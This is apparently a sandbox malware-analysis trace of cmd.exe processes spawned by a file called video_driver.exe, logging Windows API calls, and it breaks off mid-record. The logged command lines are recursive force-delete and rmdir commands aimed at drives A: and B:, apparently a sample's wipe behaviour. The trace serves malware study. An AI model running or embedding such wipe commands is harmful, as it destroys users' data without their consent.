(_Seed=0x5eb34b65) [0056.702] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" [0056.702] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" [0056.702] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0056.702] GetProcessHeap () returned 0x490000 [0056.702] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x4a20f8 [0056.702] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0056.703] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0056.703] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0056.703] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0056.703] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0056.703] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0056.703] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0056.703] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0056.703] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0056.703] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0056.703] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0056.703] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0056.703] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0056.703] GetProcessHeap () returned 0x490000 [0056.703] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a2bd0 | out: hHeap=0x490000) returned 1 [0056.703] GetEnvironmentStringsW () returned 0x4a2310* [0056.703] GetProcessHeap () returned 0x490000 [0056.703] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xae2) returned 0x4a4c70 [0056.704] FreeEnvironmentStringsW (penv=0x4a2310) returned 1 [0056.704] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0056.704] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0056.704] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0056.704] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0056.704] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0056.704] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0056.704] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0056.704] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0056.704] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0056.704] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0056.704] GetProcessHeap () returned 0x490000 [0056.704] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x54) returned 0x4a17c8 [0056.704] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fa68 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0056.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14fa68, lpFilePart=0x14fa64 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14fa64*="Desktop") returned 0x25 [0056.704] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0056.704] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f7e4 | out: lpFindFileData=0x14f7e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4a5760 [0056.705] FindClose (in: hFindFile=0x4a5760 | out: hFindFile=0x4a5760) returned 1 [0056.705] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f7e4 | out: lpFindFileData=0x14f7e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x108960, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x108960, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4a5760 [0056.705] FindClose (in: hFindFile=0x4a5760 | out: hFindFile=0x4a5760) returned 1 [0056.705] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0056.705] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f7e4 | out: lpFindFileData=0x14f7e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4a5760 [0056.705] FindClose (in: hFindFile=0x4a5760 | out: hFindFile=0x4a5760) returned 1 [0056.705] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0056.705] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0056.705] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0056.705] GetProcessHeap () returned 0x490000 [0056.705] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4c70 | out: hHeap=0x490000) returned 1 [0056.705] GetEnvironmentStringsW () returned 0x4a4180* [0056.706] GetProcessHeap () returned 0x490000 [0056.706] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb36) returned 0x4a5fa0 [0056.706] FreeEnvironmentStringsW (penv=0x4a4180) returned 1 [0056.706] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0056.706] GetProcessHeap () returned 0x490000 [0056.706] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a17c8 | out: hHeap=0x490000) returned 1 [0056.706] GetProcessHeap () returned 0x490000 [0056.706] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400e) returned 0x4a6ae0 [0056.706] GetProcessHeap () returned 0x490000 [0056.706] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa0) returned 0x4a2e50 [0056.706] GetProcessHeap () returned 0x490000 [0056.706] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6ae0 | out: hHeap=0x490000) returned 1 [0056.707] GetConsoleOutputCP () returned 0x1b5 [0056.707] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0056.707] GetUserDefaultLCID () returned 0x409 [0056.707] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fba8, cchData=128 | out: lpLCData="0") returned 2 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fba8, cchData=128 | out: lpLCData="0") returned 2 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fba8, cchData=128 | out: lpLCData="1") returned 2 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0056.708] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0056.708] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0056.710] GetProcessHeap () returned 0x490000 [0056.710] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20c) returned 0x4a2ef8 [0056.710] GetConsoleTitleW (in: lpConsoleTitle=0x4a2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0056.710] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0056.710] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0056.710] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0056.710] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0056.711] GetProcessHeap () returned 0x490000 [0056.711] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4a6ae0 [0056.711] GetProcessHeap () returned 0x490000 [0056.711] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x4aaaf8 [0056.711] GetProcessHeap () returned 0x490000 [0056.711] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x1a) returned 0x4a57e0 [0056.712] GetEnvironmentVariableW (in: lpName="p IN (\"A", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0056.712] _wcsicmp (_String1="p IN (\"A", _String2="CD") returned 13 [0056.712] _wcsicmp (_String1="p IN (\"A", _String2="ERRORLEVEL") returned 11 [0056.712] _wcsicmp (_String1="p IN (\"A", _String2="CMDEXTVERSION") returned 13 [0056.712] _wcsicmp (_String1="p IN (\"A", _String2="CMDCMDLINE") returned 13 [0056.712] _wcsicmp (_String1="p IN (\"A", _String2="DATE") returned 12 [0056.712] _wcsicmp (_String1="p IN (\"A", _String2="TIME") returned -4 [0056.712] _wcsicmp (_String1="p IN (\"A", _String2="RANDOM") returned -2 [0056.712] _wcsicmp (_String1="p IN (\"A", _String2="HIGHESTNUMANODENUMBER") returned 8 [0056.712] GetProcessHeap () returned 0x490000 [0056.712] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a57e0 | out: hHeap=0x490000) returned 1 [0056.712] GetProcessHeap () returned 0x490000 [0056.712] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4aaaf8 | out: hHeap=0x490000) returned 1 [0056.712] GetProcessHeap () returned 0x490000 [0056.712] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x4aaaf8 [0056.712] GetProcessHeap () returned 0x490000 [0056.712] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4aaaf8 | out: hHeap=0x490000) returned 1 [0056.712] GetProcessHeap () returned 0x490000 [0056.712] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6ae0 | out: hHeap=0x490000) returned 1 [0056.713] _wcsicmp (_String1="if", _String2=")") returned 64 [0056.713] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0056.713] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0056.713] _wcsicmp (_String1="IF", _String2="if") returned 0 [0056.713] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0056.713] GetProcessHeap () returned 0x490000 [0056.713] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x4a3110 [0056.713] GetProcessHeap () returned 0x490000 [0056.713] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe) returned 0x49ffc0 [0056.713] GetProcessHeap () returned 0x490000 [0056.713] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x20) returned 0x4a57e0 [0056.714] GetProcessHeap () returned 0x490000 [0056.714] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a57e0, Size=0x16) returned 0x4a1800 [0056.714] GetProcessHeap () returned 0x490000 [0056.714] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a1800) returned 0x16 [0056.714] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0056.715] GetProcessHeap () returned 0x490000 [0056.715] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x4a3170 [0056.715] GetProcessHeap () returned 0x490000 [0056.715] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x14) returned 0x4a31d0 [0056.715] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0056.715] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0056.715] GetProcessHeap () returned 0x490000 [0056.715] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x12) returned 0x4a31f0 [0056.715] GetProcessHeap () returned 0x490000 [0056.715] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x1c) returned 0x4a57e0 [0056.715] GetProcessHeap () returned 0x490000 [0056.715] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a57e0, Size=0x14) returned 0x4a3210 [0056.715] GetProcessHeap () returned 0x490000 [0056.715] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a3210) returned 0x14 [0056.716] _wcsicmp (_String1="del", _String2=")") returned 59 [0056.716] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0056.716] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0056.716] _wcsicmp (_String1="IF", _String2="del") returned 5 [0056.716] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0056.716] _wcsicmp (_String1="REM", _String2="del") returned 14 [0056.716] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0056.716] GetProcessHeap () returned 0x490000 [0056.716] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x4a3230 [0056.716] GetProcessHeap () returned 0x490000 [0056.716] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x10) returned 0x49ffd8 [0056.717] GetProcessHeap () returned 0x490000 [0056.717] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x28) returned 0x4a3290 [0056.717] GetProcessHeap () returned 0x490000 [0056.717] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x4a32c0 [0056.718] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0056.718] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0056.718] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0056.718] GetProcessHeap () returned 0x490000 [0056.718] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x4a3320 [0056.718] GetProcessHeap () returned 0x490000 [0056.718] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x44) returned 0x4a3380 [0056.718] GetProcessHeap () returned 0x490000 [0056.718] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x14) returned 0x4a33d0 [0056.719] GetProcessHeap () returned 0x490000 [0056.719] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a33d0, Size=0x12) returned 0x4a33d0 [0056.719] GetProcessHeap () returned 0x490000 [0056.719] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a33d0) returned 0x12 [0056.719] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0056.719] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0056.719] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0056.719] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0056.719] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0056.719] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0056.720] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0056.720] GetProcessHeap () returned 0x490000 [0056.720] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x12) returned 0x4a33f0 [0056.720] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0056.721] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0056.721] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0056.721] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0056.721] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0056.721] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0056.721] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0056.721] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0056.721] GetProcessHeap () returned 0x490000 [0056.721] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x4a3410 [0056.721] GetProcessHeap () returned 0x490000 [0056.721] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x14) returned 0x4a3470 [0056.722] GetProcessHeap () returned 0x490000 [0056.722] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x20) returned 0x4a57e0 [0056.723] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0056.725] GetFullPathNameW (in: lpFileName="A:", nBufferLength=0x208, lpBuffer=0x14f898, lpFilePart=0x14f644 | out: lpBuffer="A:\\", lpFilePart=0x14f644*=0x0) returned 0x3 [0056.725] wcsncmp (_String1="A:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -27 [0056.730] GetFileAttributesW (lpFileName="A:\\" (normalized: "a:")) returned 0xffffffff [0056.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.730] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0056.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.777] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0056.777] _get_osfhandle (_FileHandle=0) returned 0x3 [0056.777] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0056.778] SetConsoleInputExeNameW () returned 0x1 [0056.778] GetConsoleOutputCP () returned 0x1b5 [0056.778] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0056.778] SetThreadUILanguage (LangId=0x0) returned 0x409 [0056.778] exit (_Code=0) Process: id = "21" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x446d7000" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"B:\" del /f /s /q \"B:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0x838 [0056.972] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f84c | out: lpSystemTimeAsFileTime=0x20f84c*(dwLowDateTime=0x1733640, dwHighDateTime=0x1d62400)) [0056.972] GetCurrentProcessId () returned 0x828 [0056.972] GetCurrentThreadId () returned 0x838 [0056.972] GetTickCount () returned 0x11466af [0056.972] QueryPerformanceCounter (in: lpPerformanceCount=0x20f844 | out: lpPerformanceCount=0x20f844*=17710554294) returned 1 [0056.973] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0056.973] __set_app_type (_Type=0x1) [0056.973] __p__fmode () returned 0x770331f4 [0056.973] __p__commode () returned 0x770331fc [0056.974] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0056.974] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0056.974] GetCurrentThreadId () returned 0x838 [0056.974] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x838) returned 0x60 [0056.974] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0056.974] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0056.974] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.046] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f7dc | out: phkResult=0x20f7dc*=0x0) returned 0x2 [0057.046] VirtualQuery (in: lpAddress=0x20f813, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.046] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0057.046] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0057.046] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.046] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0057.046] GetConsoleOutputCP () returned 0x1b5 [0057.047] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.047] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0057.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.047] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0057.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.047] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0057.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.047] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0057.048] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.048] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0057.048] GetEnvironmentStringsW () returned 0x3e20f8* [0057.048] GetProcessHeap () returned 0x3d0000 [0057.048] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xaca) returned 0x3e2bd0 [0057.048] FreeEnvironmentStringsW (penv=0x3e20f8) returned 1 [0057.048] GetProcessHeap () returned 0x3d0000 [0057.048] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4) returned 0x3e1898 [0057.048] GetEnvironmentStringsW () returned 0x3e20f8* [0057.048] GetProcessHeap () returned 0x3d0000 [0057.048] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xaca) returned 0x3e36a8 [0057.049] FreeEnvironmentStringsW (penv=0x3e20f8) returned 1 [0057.049] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e74c | out: phkResult=0x20e74c*=0x68) returned 0x0 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x0, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x1, lpcbData=0x20e750*=0x4) returned 0x0 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x1, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x0, lpcbData=0x20e750*=0x4) returned 0x0 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x40, lpcbData=0x20e750*=0x4) returned 0x0 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x40, lpcbData=0x20e750*=0x4) returned 0x0 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: 